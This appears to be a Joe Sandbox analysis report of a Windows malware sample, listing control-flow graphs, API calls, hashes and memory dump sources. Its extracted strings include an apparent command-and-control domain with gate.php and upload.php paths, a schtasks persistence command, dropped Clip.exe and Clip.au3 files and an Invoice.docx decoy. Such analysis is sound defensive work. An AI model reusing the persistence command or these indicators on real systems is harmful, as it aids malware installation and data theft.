          • Opcode Fuzzy Hash: b6b88cacc741c7ab8afb9880c199e93aeda8dfe811ec623b8a36b44c48a1d797
          • Instruction Fuzzy Hash: 1EE08C32911268EBCB15DBC8C904D8AF3EDEB44B40B1140A6B501D3202CA72DE00D7D0

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 660 5d720-5d78c call 60380 RegOpenKeyExW 663 5d7e4 660->663 664 5d78e 660->664 666 5d7e6-5d801 call 6048f 663->666 665 5d790-5d7c8 call 60380 RegEnumKeyExW 664->665 671 5daa7-5dabe call 60380 RegCloseKey 665->671 672 5d7ce-5d7d0 665->672 671->666 673 5d802-5d830 call 60380 RegOpenKeyExW 672->673 674 5d7d2-5d7dc call 60380 672->674 673->674 681 5d832-5d86c call 60380 RegQueryValueExW 673->681 674->663 684 5da80-5daa2 call 60380 RegCloseKey 681->684 685 5d872-5d894 call 5f960 681->685 684->665 690 5d896-5d89d 685->690 691 5d89f-5d8a2 685->691 690->690 690->691 692 5d8a4-5d8b2 691->692 692->692 693 5d8b4-5d8be 692->693 694 5d8c0-5d8c7 693->694 695 5d8c9-5d8cf 693->695 694->694 694->695 696 5d8d0-5d8de 695->696 696->696 697 5d8e0-5d8eb 696->697 698 5d8ed 697->698 699 5d8f9-5d8ff 697->699 700 5d8f0-5d8f7 698->700 701 5d901-5d90f 699->701 700->699 700->700 701->701 702 5d911-5d950 call 60380 RegQueryValueExW 701->702 705 5d9e5-5da1a call 60380 702->705 706 5d956-5d960 702->706 705->684 718 5da1c-5da51 call 60380 705->718 708 5d962-5d969 706->708 709 5d96b 706->709 708->708 708->709 711 5d971-5d97f 709->711 711->711 712 5d981-5d98c 711->712 714 5d98e 712->714 715 5d999-5d99f 712->715 716 5d990-5d997 714->716 717 5d9a1-5d9af 715->717 716->715 716->716 717->717 719 5d9b1-5d9bb 717->719 718->684 728 5da53-5da5d 718->728 722 5d9bd 719->722 723 5d9c9-5d9cf 719->723 724 5d9c0-5d9c7 722->724 725 5d9d0-5d9de 723->725 724->723 724->724 725->725 727 5d9e0 725->727 727->684 729 5da5f 728->729 730 5da69-5da6f 728->730 731 5da60-5da67 729->731 732 5da70-5da7e 730->732 731->730 731->731 732->684 732->732
          APIs
          • RegOpenKeyExW.KERNELBASE(80000001,0005E472,00000000,00020119,?,7D5DF9B0,00000000,00000000,00000000), ref: 0005D788
          • RegEnumKeyExW.KERNELBASE(?,00000000,?,00000100,00000000,00000000,00000000,00000000), ref: 0005D7BC
          • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 0005D827
          • RegQueryValueExW.KERNELBASE(?,DisplayName,00000000,00000200,?,00000200), ref: 0005D868
          • RegQueryValueExW.KERNELBASE(?,DisplayVersion,00000000,?,?,00000200), ref: 0005D94C
          • RegCloseKey.KERNELBASE(?), ref: 0005DAA0
          • RegCloseKey.KERNELBASE(?), ref: 0005DAB7
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: CloseOpenQueryValue$Enum
          • String ID: (Version: $)$DisplayName$DisplayVersion
          • API String ID: 1752312236-2099137428
          • Opcode ID: a43d7158014b8a64debae4a725289ae1c2524d28e856a82bc78f7d4b2570f122
          • Instruction ID: f1020c401a7514af38de0c6bb0b71d60d6098e30a06699a331372ee90ae8d362
          • Opcode Fuzzy Hash: a43d7158014b8a64debae4a725289ae1c2524d28e856a82bc78f7d4b2570f122
          • Instruction Fuzzy Hash: 91A114709402169ADB74DB64CC51BBBB3B6EF44300F0082DAEA096B2C0EF759E89CB55

          Control-flow Graph

          Strings
          • LocalAppData, xrefs: 000545DB
          • \Desktop\Invoice.docx, xrefs: 00054635, 0005464A
          • oSab, xrefs: 00054490
          • tztwo2ht.top\PoconusurioSabnN\ServiceData\ServiceData\Clip.au3\ServiceData\Clip.exe/c schtasks /create /tn \Service\Data /tr """"%wS""" """%wS"""" /st 00:01 /du 9800:59 /sc once /ri 1 /fGETPOST/index.php/gate.php/zip.php/upload.phpcur, xrefs: 00054487
          • nN, xrefs: 00054498
          • \Poconusuri, xrefs: 0005460D, 0005461F
          • UserProfile, xrefs: 000545EB
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID: LocalAppData$UserProfile$\Desktop\Invoice.docx$\Poconusuri$nN$oSab$tztwo2ht.top\PoconusurioSabnN\ServiceData\ServiceData\Clip.au3\ServiceData\Clip.exe/c schtasks /create /tn \Service\Data /tr """"%wS""" """%wS"""" /st 00:01 /du 9800:59 /sc once /ri 1 /fGETPOST/index.php/gate.php/zip.php/upload.phpcur
          • API String ID: 0-2699568637
          • Opcode ID: e5677d8e51bfe5fd58d660765a3dd737e04a3c2d08f6ffaca903c820316f369a
          • Instruction ID: 3b1b7723263df8cedd3a42f5a6b297898280ec91679c24be1b90a45d07d51def
          • Opcode Fuzzy Hash: e5677d8e51bfe5fd58d660765a3dd737e04a3c2d08f6ffaca903c820316f369a
          • Instruction Fuzzy Hash: 0241E23060461246EB04BF60C8667FFB2A3DF81345F448978F9459F2C3EF289A898396

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 787 6ffda4-6ffdc3 788 6ffdfd-6ffe00 787->788 789 6ffdc5-6ffdd7 call 75736d 787->789 791 6ffe24-6ffe2c 788->791 792 6ffe02-6ffe05 788->792 796 6ffddc-6ffdde 789->796 794 6fffde-6fffe7 791->794 795 6ffe32-6ffe34 791->795 793 6ffe08-6ffe0b 792->793 797 6ffe0d-6ffe10 793->797 798 6ffe15-6ffe1e 793->798 799 6fffe9-6fffee 794->799 800 6ffff1-6ffff4 794->800 795->794 801 6ffe3a-6ffe3d 795->801 802 6ffde8-6ffdf3 call 796fed 796->802 803 6ffde0-6ffde6 796->803 797->793 804 6ffe12 797->804 807 6ffe21 798->807 808 6ffe20 798->808 799->800 805 6ffffe-70000d call 703ef5 800->805 806 6ffff6-6ffffb 800->806 809 6ffe43-6ffe49 801->809 810 70000f-700011 801->810 802->788 803->788 804->798 805->810 820 700016-700019 805->820 806->805 807->791 808->807 814 6ffe4b-6ffe50 809->814 815 6ffe53-6ffe7a MultiByteToWideChar 809->815 813 700137-700148 call 702ee6 810->813 814->815 815->810 819 6ffe80 815->819 822 6ffec5 819->822 823 6ffe82-6ffe8c 819->823 824 7000fa-700111 call 79954f 820->824 825 70001f-700039 call 703f3e 820->825 826 6ffec8-6ffecb 822->826 823->822 827 6ffe8e-6ffe97 823->827 844 700114-700117 824->844 825->810 841 70003b-700054 call 7df2e1 825->841 826->810 829 6ffed1-6ffee4 MultiByteToWideChar 826->829 831 6ffeac-6ffeb5 call 6ff8f7 827->831 832 6ffe99-6ffea2 call 704100 827->832 836 6fffcd-6fffd9 call 6ffd84 829->836 837 6ffeea-6fff05 call 75d992 MultiByteToWideChar 829->837 848 6ffec0-6ffec3 831->848 849 6ffeb7 831->849 847 6ffea4-6ffeaa 832->847 832->848 836->813 837->836 858 6fff0b-6fff12 837->858 869 700056-700058 841->869 870 70005d 841->870 845 700122-700127 844->845 846 700119-700121 call 6fe2ca 844->846 855 700135 845->855 856 700129-70012c 845->856 846->845 854 6ffebd 847->854 848->826 849->854 854->848 855->813 856->855 862 70012e-700134 call 6fe2ca 856->862 859 6fff3d-6fff3f 858->859 860 6fff14-6fff17 858->860 865 6fff86 859->865 866 6fff41-6fff4b 859->866 860->836 864 6fff1d-6fff20 860->864 862->855 864->836 871 6fff26-6fff38 MultiByteToWideChar 864->871 868 6fff88-6fff8a 865->868 866->865 872 6fff4d-6fff56 866->872 868->836 874 6fff8c-6fffa2 call 7ee5a8 868->874 869->844 875 70009c 870->875 876 70005f-700062 870->876 871->836 877 6fff6e-6fff77 call 6ff8f7 872->877 878 6fff58-6fff61 call 704100 872->878 891 6fffc6-6fffcc call 6ffd84 874->891 892 6fffa4-6fffa9 874->892 883 70009e-7000a0 875->883 876->875 880 700064-70006c 876->880 896 6fff79-6fff7f 877->896 897 6fff82-6fff84 877->897 878->836 894 6fff63-6fff6c 878->894 886 700084-70008d call 6ff8f7 880->886 887 70006e-700077 call 704100 880->887 883->869 884 7000a2-7000c6 call 702c70 883->884 911 7000c8-7000ca 884->911 912 7000cc-7000ee call 703f3e 884->912 907 700098-70009a 886->907 908 70008f-700095 886->908 887->869 905 700079-700082 887->905 891->836 899 6fffaf-6fffb2 892->899 900 6fffab-6fffad 892->900 894->868 896->897 897->868 904 6fffb5-6fffc3 call 76dacc 899->904 900->904 904->891 905->883 907->883 908->907 914 7000f1-7000f8 call 6ffd84 911->914 912->914 914->844
          APIs
          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?,?,?), ref: 006FFE74
          • _malloc.LIBCMT ref: 006FFEAD
          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 006FFEE0
          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?), ref: 006FFEFC
          • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 006FFF36
          • _malloc.LIBCMT ref: 006FFF6F
          • __freea.LIBCMT ref: 006FFFC7
          • __freea.LIBCMT ref: 006FFFD0
          • _malloc.LIBCMT ref: 00700085
          • _memset.LIBCMT ref: 007000A7
          • __freea.LIBCMT ref: 007000F2
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: ByteCharMultiWide$__freea_malloc$_memset
          • String ID:
          • API String ID: 3920393152-0
          • Opcode ID: 529bc0e6fbc024704249341d0bee3891ba6fea4daa854f5e949187950261ef3a
          • Instruction ID: 2f365da9317c935d4877c4087ba904b748de7f0d21d36f2572c7e2cc601398de
          • Opcode Fuzzy Hash: 529bc0e6fbc024704249341d0bee3891ba6fea4daa854f5e949187950261ef3a
          • Instruction Fuzzy Hash: E6B1AD7280015EEFCF219FA4CC859FE7BA6EF09314F144239FA15A62A1D7398D61DB90

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 919 544e5-544fc 920 54513-5451a 919->920 921 5451c-545fb call 5ee40 * 2 920->921 922 544d8-54501 920->922 932 54767-5477a call 6048f 921->932 933 54601-54603 921->933 922->920 933->932 934 54609-5461f 933->934 938 54625-54633 934->938 938->938 939 54635-5464a 938->939 941 54650-5465e 939->941 941->941 942 54660-54669 call 5ef00 941->942 945 5466f-54678 call 5ef00 942->945 946 54759-54762 call 54840 * 2 942->946 945->946 951 5467e-546e5 call 60380 CreateDirectoryW call 5a8f0 call 60380 Sleep call 5fa10 call 5a8c0 call 60380 Sleep call 5fbb0 call 60380 Sleep call 5fd70 945->951 946->932 951->946
          APIs
          • CreateDirectoryW.KERNELBASE(00000000,00000000,00001770), ref: 0005468D
          • Sleep.KERNELBASE(0000015E), ref: 000546A8
          • Sleep.KERNELBASE(0000028A), ref: 000546C8
          • Sleep.KERNELBASE(000002BC), ref: 000546E3
          • Sleep.KERNELBASE(0000028A), ref: 000546FE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Sleep$CreateDirectory
          • String ID: LocalAppData$UserProfile$\Desktop\Invoice.docx$\Poconusuri
          • API String ID: 2746843503-705830698
          • Opcode ID: bee2af8e8a35d8c2932d74ef57497daff568d9bb8549839dd3117635ad471429
          • Instruction ID: 12a337fcde7c8327486a3bb0a41e488973547873af1c5b865c0ae21d42b78ab3
          • Opcode Fuzzy Hash: bee2af8e8a35d8c2932d74ef57497daff568d9bb8549839dd3117635ad471429
          • Instruction Fuzzy Hash: 3D41DB34A0061247DF696B60C8163FF6293EF8130AF159579ED468B3D7FE38898A8356

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 970 54504-54510 971 54513-5451a 970->971 972 5451c-545fb call 5ee40 * 2 971->972 973 544d8-54501 971->973 983 54767-5477a call 6048f 972->983 984 54601-54603 972->984 973->971 984->983 985 54609-5461f 984->985 989 54625-54633 985->989 989->989 990 54635-5464a 989->990 992 54650-5465e 990->992 992->992 993 54660-54669 call 5ef00 992->993 996 5466f-54678 call 5ef00 993->996 997 54759-54762 call 54840 * 2 993->997 996->997 1002 5467e-546e5 call 60380 CreateDirectoryW call 5a8f0 call 60380 Sleep call 5fa10 call 5a8c0 call 60380 Sleep call 5fbb0 call 60380 Sleep call 5fd70 996->1002 997->983 1002->997
          APIs
          • CreateDirectoryW.KERNELBASE(00000000,00000000,00001770), ref: 0005468D
          • Sleep.KERNELBASE(0000015E), ref: 000546A8
          • Sleep.KERNELBASE(0000028A), ref: 000546C8
          • Sleep.KERNELBASE(000002BC), ref: 000546E3
          • Sleep.KERNELBASE(0000028A), ref: 000546FE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Sleep$CreateDirectory
          • String ID: LocalAppData$UserProfile$\Desktop\Invoice.docx$\Poconusuri
          • API String ID: 2746843503-705830698
          • Opcode ID: 0db0324cb13588c927c3387b6bcf8cb098c7b9780f37268a66f0f08ed5478ab3
          • Instruction ID: bd3f3f0d5cc82a93595e41d85518d24e822d5d567fc44ff6adfc554d66f98b56
          • Opcode Fuzzy Hash: 0db0324cb13588c927c3387b6bcf8cb098c7b9780f37268a66f0f08ed5478ab3
          • Instruction Fuzzy Hash: F941EA30A0061247DF686B60C8563FF6293EF8130AF159578ED428B3D7EF38898A8352

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1021 544d8-5451a 1024 5451c-545fb call 5ee40 * 2 1021->1024 1033 54767-5477a call 6048f 1024->1033 1034 54601-54603 1024->1034 1034->1033 1035 54609-5461f 1034->1035 1039 54625-54633 1035->1039 1039->1039 1040 54635-5464a 1039->1040 1042 54650-5465e 1040->1042 1042->1042 1043 54660-54669 call 5ef00 1042->1043 1046 5466f-54678 call 5ef00 1043->1046 1047 54759-54762 call 54840 * 2 1043->1047 1046->1047 1052 5467e-546e5 call 60380 CreateDirectoryW call 5a8f0 call 60380 Sleep call 5fa10 call 5a8c0 call 60380 Sleep call 5fbb0 call 60380 Sleep call 5fd70 1046->1052 1047->1033 1052->1047
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID: LocalAppData$UserProfile$\Desktop\Invoice.docx$\Poconusuri
          • API String ID: 0-705830698
          • Opcode ID: 95acf727781b2baca1250bbdc0770207f32445df375aac9ca376ef95059c55fd
          • Instruction ID: 0ccf9a9ec9cb521b53d89bf45b43780db33297594b151a5a93c2f8e46c048ef1
          • Opcode Fuzzy Hash: 95acf727781b2baca1250bbdc0770207f32445df375aac9ca376ef95059c55fd
          • Instruction Fuzzy Hash: 1441A434A0161246EF692B60C4263FF62A3EF8130AF159579EE414F2C7EE388DC98352

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1071 54599-545bc 1073 54550-54558 1071->1073 1074 545be-545fb call 5ee40 * 2 1071->1074 1073->1074 1080 54767-5477a call 6048f 1074->1080 1081 54601-54603 1074->1081 1081->1080 1082 54609-5461f 1081->1082 1086 54625-54633 1082->1086 1086->1086 1087 54635-5464a 1086->1087 1089 54650-5465e 1087->1089 1089->1089 1090 54660-54669 call 5ef00 1089->1090 1093 5466f-54678 call 5ef00 1090->1093 1094 54759-54762 call 54840 * 2 1090->1094 1093->1094 1099 5467e-546e5 call 60380 CreateDirectoryW call 5a8f0 call 60380 Sleep call 5fa10 call 5a8c0 call 60380 Sleep call 5fbb0 call 60380 Sleep call 5fd70 1093->1099 1094->1080 1099->1094
          APIs
          • CreateDirectoryW.KERNELBASE(00000000,00000000,00001770), ref: 0005468D
          • Sleep.KERNELBASE(0000015E), ref: 000546A8
          • Sleep.KERNELBASE(0000028A), ref: 000546C8
          • Sleep.KERNELBASE(000002BC), ref: 000546E3
          • Sleep.KERNELBASE(0000028A), ref: 000546FE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
